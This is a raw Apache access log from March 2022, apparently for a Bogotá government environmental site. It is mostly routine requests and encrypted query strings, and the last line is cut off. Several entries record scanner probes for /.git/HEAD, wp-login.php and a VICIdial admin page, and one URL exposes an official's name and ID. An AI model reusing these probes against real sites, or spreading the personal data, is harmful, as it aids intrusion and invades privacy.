191.95.60.179 - - [21/Mar/2022:19:28:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.33.64.49 - - [21/Mar/2022:19:29:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7871.pdf HTTP/1.1" 200 1165549
179.33.64.49 - - [21/Mar/2022:19:29:13 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [21/Mar/2022:19:31:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45940
216.245.221.92 - - [21/Mar/2022:19:32:10 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.49 - - [21/Mar/2022:19:32:48 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:19:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45311
40.77.167.78 - - [21/Mar/2022:19:34:21 -0500] "GET /portaldeninos/humedal-torca-y-guaymaral-2/ HTTP/1.1" 200 80665
201.245.192.253 - - [21/Mar/2022:19:34:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114567
207.46.13.192 - - [21/Mar/2022:19:36:26 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:19:37:10 -0500] "HEAD / HTTP/1.1" 200 -
3.65.27.28 - - [21/Mar/2022:19:37:26 -0500] "GET /.git/HEAD HTTP/1.1" 404 1035
66.249.70.45 - - [21/Mar/2022:19:38:38 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:19:41:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45940
216.245.221.92 - - [21/Mar/2022:19:42:10 -0500] "HEAD / HTTP/1.1" 200 -
177.245.144.229 - - [21/Mar/2022:19:42:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
177.245.144.229 - - [21/Mar/2022:19:42:31 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
177.245.144.229 - - [21/Mar/2022:19:42:31 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [21/Mar/2022:19:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114567
201.245.192.253 - - [21/Mar/2022:19:42:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45311
216.245.221.92 - - [21/Mar/2022:19:47:10 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Mar/2022:19:52:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:19:52:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114567
181.55.68.51 - - [21/Mar/2022:19:57:07 -0500] "GET /rdc/create.php HTTP/1.1" 200 8102
216.245.221.92 - - [21/Mar/2022:19:57:10 -0500] "HEAD / HTTP/1.1" 200 -
2.57.121.42 - - [21/Mar/2022:19:59:53 -0500] "GET /vicidial/admin.php?ADD=140000000000 HTTP/1.1" 404 1018
216.245.221.92 - - [21/Mar/2022:20:02:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:20:02:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114567
186.29.181.101 - - [21/Mar/2022:20:05:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0568.pdf HTTP/1.1" 200 324337
40.77.167.104 - - [21/Mar/2022:20:05:25 -0500] "-" 408 -
186.29.181.101 - - [21/Mar/2022:20:06:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2411.pdf HTTP/1.1" 200 934332
216.245.221.92 - - [21/Mar/2022:20:07:10 -0500] "HEAD / HTTP/1.1" 200 -
66.220.149.7 - - [21/Mar/2022:20:07:39 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
186.102.19.172 - - [21/Mar/2022:20:08:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.70.49 - - [21/Mar/2022:20:09:28 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:20:12:10 -0500] "HEAD / HTTP/1.1" 200 -
156.146.37.95 - - [21/Mar/2022:20:12:55 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
201.245.192.253 - - [21/Mar/2022:20:13:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
64.62.197.182 - - [21/Mar/2022:20:14:16 -0500] "GET / HTTP/1.1" 200 319
191.108.6.188 - - [21/Mar/2022:20:15:31 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Oftn9DICKRlNGx+IethBq2gl0hROvsBAEuQaYIEj070IKk5u+4RwPTjYSzFdK7Xf7f3F7Mjaupw==&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 30
191.108.6.188 - - [21/Mar/2022:20:15:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/F2Qi2pSTvOB/tQ4g6MI+Gm5JzoRWriBLJQCYmro+ZHp4ci3eS22af6WOlB0dkBa9Zj79rG5ko8yKH3Ju/j6Uh03L6o2zvhBA=&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 97
191.108.6.188 - - [21/Mar/2022:20:15:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX182b3483Qd5Kc1NpXOsaDxUQ6FY5g1F77Hc5xMKhiwj8z8OaAhFVSl0v5x7LhS39pfTeTakj926sHE+hoOaYc1Mo1c+e7trjsHb2KuB+EY5Mw6oTi/AaWY766rZrkUDM0HkPQs5qM1Wjx1kwZOG3v8eJZZR3uDELDwfzw+1kWbeCnLgInIF+rvR15WAQSHv/0GwoVS9nlMV/V8i5MMeAJkusSRAbzxgY7puyXsjART7NQNdDidLQq1G18jc5BitS1spMZKzE6Z479AfhP78+Vka9E/9a6FrSDwFAbWYS0YXrhdjbOA2fJzFoyfw4bWrfVjMPSDu2rikNf9sWKsV5fgvFU8orho+MBenb3DRJg/ccq/00uiv9G4Sctan0ieVv6ENHqub5EgHsMcvZCmCKrGKlKciaXdvUXYSXkwYafcuoKQD04vI+hAMwk2Enfa90gdKWqTo6g9McE1LWjSwEoX40CRAd+ZNEv9l5uTc22H6LN3/LhbyfLX/MLRJxoq27huTBzhA23AVlK9cED4i+8A5Fk8iPPtqfCywsqpnkdFOKGeM4x/38DZSyNKJYu8jMjXI9pN/Xx7f9c8mknw9wRCOfPl8illDYP+p4CeCagoRfpIUxojdMbP8F03Hx75Y5bk5h8LpJsF54pEwNhngGZXr9bIPcGyIdRGack3F97eUPoxFsZiMV2sW0A/19V1B0nkQH9T60g0q52wcLNJTb0OKkhglo9kNByMwv8VogBcXan3oR/w2DHvi0+2QZith0jaGUG8rw2S9rwnXlDRmgAPepwVZZTmtNLgpY4lBzfLO1KpSgcj+Sl+UVH3JdOym6ucVpZmo428kCK4Tf+6r7fvYte55cFmjLMg7tOESgM3Y0hsZIyDB7rcdDmNZFATQS7IJft0TBKRphc/X8ZvAQMic5r4/N8DMoNMKyWm2nzL+MMp2V09YDDr7BjcxtdWnpsTXAfcQK7O6xt8//5ePh1O1YMb2zgyEukIbhgAHx6gEAfHcPf+Hc3EKfNNL8BFouch6BAYkYxS+yQJf4lv/09LcI485hdGUb9TNvFDsUUX6ECIC0qGNXUF0jaC2WvYtpJc7iQoO8vWXpu9pymTIIS+pImus0ff4w2a6D03et15bXRajPgyCVVFf&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 7350
191.108.6.188 - - [21/Mar/2022:20:15:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+1j6MfdUMpNcO7rGVfX0/GQuQ2MdZEHMKX+7DglguCEZtvO6qkXEeO&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/ko8EdgcqLi83eTCFcvAmC49KdwZSQQTLIc0MDDLdDdV6T+sPh71V7&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Co7EwaTy3b12ZkQecsVYyllhg7dSMhgPC0VLf0Qni1vnLWRpI344T&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19fN8NeGbfRBYr6bAg6F+29QmU5MqyDukJeyFoQbpuT4XlBZobaDg9s&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18MN2SCaoXCKbcBu6X6v0ZzutGrX2/WCXzAbTapLbPVLwNTZQGRCG2o&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18wa41lZN4f0KGsvy3nqWsnDsOlGk1iMPalQDyL5u0LkSue6SgCicZ1&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18dI93ktlIuuw0k5JU8GuWJe6PkFmylJYs4HhP2u9BaE+kQH4Dxsf3b&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18YYRmwVm+OTFrOjknGd5ztOwc1rPql3dQf7fDPfla3J0FsK55D1VNq&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/LjC+3j1uxb+InBKhcNAIItazHzOzOPVsjPgudJ9fWz21OwlWR5ETy&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Lsm3433TsZw7E1fGxAsfiLPYeaKVB/nAky4IqjvGJaEOLmaZSZndI&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Ahg+DGwHMfdqi/a57ftQzy6D8yJIf823nRY0GAnLY+ciHtI9O2T3D&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+LaN7I94uI0G/Y+7QjIOFX6p8XBkQVKGEyJyA5uvpiffpPPwYp9zTS&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Cheb0eNzz6oHL4/1n38WINkkGMHM4O3dm+Z74r92HJqcIB0y2eIzf&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+K2nCnzpjS93V/y90WxH/TjQPOa3tLlFY6VBcWidw91VleEvcryQZk&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19/9StYYrMlvTM9vOn4+k44SvA6dk7RTJVra8xFSZC3AW26ODyQmUvK&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19fywtQGa9JRHA0wGLJeIh//P16aoR73h7nkOZCf4LRkLr2IkK3PhU5&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+cqEdH4BHMClgi3laVXydHNnxp+IFZHiYXaRjX1/te9KyAvQzfPt48&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+rCkU8UmB+3HTKCSFtPnmfDqttOIyhXYnKOTw/5ygi/lhhsmkiLQB5&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19U78Qc5zVXchcBw5CYzv8/dbwDo7RslOY2kQujoY1t8dK+5pyOsU1w&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18qI0mLmyKrReewk5OSuY4fFpufbiqQGWSrLOdfgKj2hbL3EVTFE1JN&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+zroSWKkrH021jSuH/4tK9Fq/6JUU8PZYkECj2Y/DoZUrQzcsgob9P&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19EdNwzLn4T2Vr3gJ7ZrwrSIiZNI2ndWIemJEGgZxMycr0ibO3Ge0+0&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/oNCamBrgBnHGRxXJdOWbBU+GAivZ0LWkiM2d521wH/RZrsIXDZEb1&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/vYb5VbZtL39b6rLcO6xu0TNSZk1DX5r3M0Yr97A5OwfEW4mpjz3KR&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18UvlCQaQm17teTPmJWlLHiqYlVo3ZxkgPaFC89p+42uc3j9yD3j2wU&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+lrSGPX2ihRDJ2GLY6T72Pts4lVbzBebtJGARB65PGVYbG38u80vQg&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19ohpYsHd206Ah7jX+XyI36Gj/kgdGGtpW4fkTvf1MmJXtFgiixYrbO&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18QhCLswrIT1eCYQP0FelU2fm54rJCY4+7yZdwF8RyiVBERZhNjtl2s&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Ri+DccuGs9Bl0AxZG/1VDlVNDqgXBfqappbJXBWGwlutuzpAA19GI&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 70
191.108.6.188 - - [21/Mar/2022:20:15:34 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+6Ug2tcOwYsa80XGxkilDh+9lyB6O5iPlRvM3bCIxl2PMIp/d9JRhOMyzNJ+3Z2Xiul/5lYGt3IV59iBnCCwtCeti3sqHJN/rpOHMHzZ9bFVJZMeiOdY5wF2ipo4gEhKMum2eczFz+xI+2jFhYW4mXJXFltiNpixDdpLdN3tbtjYPPByED6B+wbS7DqG30Jk/w8wUxbzthM0bTwu1Q7u8vkNI7lAsc4miyRMiLscrCdlICjyx1NqOak4wlTERCF5qu4uNkrzfaP3E3c3p4LcGa2K6qRoO3WAtUySEuJGEvnRUSViXNlWPptRzUVCgQFWTGUIpPJ/vm7gCitHuvyi0yDJQNrpEpptw=&u=U2FsdGVkX19Jr4AqxC4TvdOA7YgClaVJGZ4keLhzjQoBANv1SQJqJwm/aA498Fpe&y=U2FsdGVkX19unqTumUgZfat7qsSsNusM/wtYFKjlVpR+Tp+YlMQNes/F6CAUP1XF HTTP/1.1" 200 196
191.108.6.188 - - [21/Mar/2022:20:15:34 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Oftn9DICKRlNGx+IethBq2gl0hROvsBAEuQaYIEj070IKk5u+4RwPTjYSzFdK7Xf7f3F7Mjaupw== HTTP/1.1" 200 30975
216.245.221.92 - - [21/Mar/2022:20:17:10 -0500] "HEAD / HTTP/1.1" 200 -
181.52.20.217 - - [21/Mar/2022:20:17:29 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.52.20.217 - - [21/Mar/2022:20:17:31 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.52.20.217 - - [21/Mar/2022:20:18:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.52.20.217 - - [21/Mar/2022:20:18:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 7785
181.52.20.217 - - [21/Mar/2022:20:18:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 6650
181.52.20.217 - - [21/Mar/2022:20:18:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 11338
181.52.20.217 - - [21/Mar/2022:20:19:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 7785
186.84.22.124 - - [21/Mar/2022:20:19:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
181.52.20.217 - - [21/Mar/2022:20:19:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 6650
181.52.20.217 - - [21/Mar/2022:20:19:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 10576
157.55.39.218 - - [21/Mar/2022:20:19:42 -0500] "GET /bla/resoluciones/resoluciones%202021/4117.pdf HTTP/1.1" 200 343100
186.84.22.124 - - [21/Mar/2022:20:19:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5762&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 1058
186.84.22.124 - - [21/Mar/2022:20:19:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5762.pdf HTTP/1.1" 200 4344645
181.52.20.217 - - [21/Mar/2022:20:19:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 7785
181.52.20.217 - - [21/Mar/2022:20:20:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 6650
181.52.20.217 - - [21/Mar/2022:20:20:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 11338
181.52.20.217 - - [21/Mar/2022:20:21:56 -0500] "GET /appsia/controlador?comando=regresar&id=20391573&funcionario=CLAUDIA+YANIRA+GODOY+ORJUELA&desde=20391573&hasta=20391573&version=20391573 HTTP/1.1" 200 7785
181.52.20.217 - - [21/Mar/2022:20:22:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [21/Mar/2022:20:21:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45917
181.52.20.217 - - [21/Mar/2022:20:22:03 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
186.84.22.124 - - [21/Mar/2022:20:22:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1545&usuario=&sector=&fecha=2012&resuelve= HTTP/1.1" 200 1026
216.245.221.92 - - [21/Mar/2022:20:22:10 -0500] "HEAD / HTTP/1.1" 200 -
45.182.190.21 - - [21/Mar/2022:20:22:43 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Mar/2022:20:22:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45302
201.245.192.253 - - [21/Mar/2022:20:22:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114558
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18F/R9yLvfYXwUTGySr8R08NhhN85JlR7EucSmxkeZ2RrJyEhf1ZAofVshVa57KBSZZlIMmpFMavQ==&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 30
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Zyaoby1pKrHyLMiOXMK9aHQorvBhYfJIUUP9MOvervwMYH8B6HXD6a6uOPFXvrH/7MzmH+o2OW1nuz4hoE8GAEZCkiC9brMc=&u=U2FsdGVkX1+JSIQ02qahO8EaqVD23vEHUMzHIFmhNr4us+6fR7l6P1HUFr2NzLUy&y=U2FsdGVkX1+NGLsQLbOHj1mj0N6PrO2wI8QZt0hKvRJiCJd7Kdw8lLEbE1krJwvT HTTP/1.1" 200 97
191.108.6.188 - - [21/Mar/2022:20:23:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+adAAIz6gJ6XFyZLrC1IxWo/f3TG7E5kfZexbn1BTsJjuxslWiUtaBkIFPETBgPiAftFUyotLyAS5Qe583Wioe05v4ERo8aER/TbM5+McP9ysPd+9p5NhNb0Zz5ugM1Tv9ZpeZEzzTN5nGQWUc8IgtpWnS77Ap3OR1m13yYqSIRxA7+P1mA3jHGYsfMRHYWg6OVtZLBcdFtjyKojvZDmorE+jboyXxTS533ccwjTO8peopNuLXyXHRrmOXAA215yvrvK/XeU+X5WNmTHMK+pxWfR27w+b6Cn9QmVdEob0mV8W5uFWLxRx642igfnkQOQqxIGXbLEyVA7UXKYpOIoH8+ZyUsCMEsqO/wgmDXiEC/wIrQmbpRS/KLKalVl/4qVcZuNDdwn92RDHlmWwU+e7TUY1dOacIofFJLubTx0uogpj9PRJ5hNe+PSs+1and53FgN0OG55IklPPgUH6dOAG7vkC1UkOAAJxMjSkN6oHwTq7upmJn47nNw8an9N19WQnFt+HbzIfk3xN9qHnIPnS5z9R8swWaV/UDW/M/+R4e/2wPz+nh1Pa5/xgbANlvIVt6fuWGJCcj5woo1QgP1QEL5sfoIOSOw3ZdWiDna6W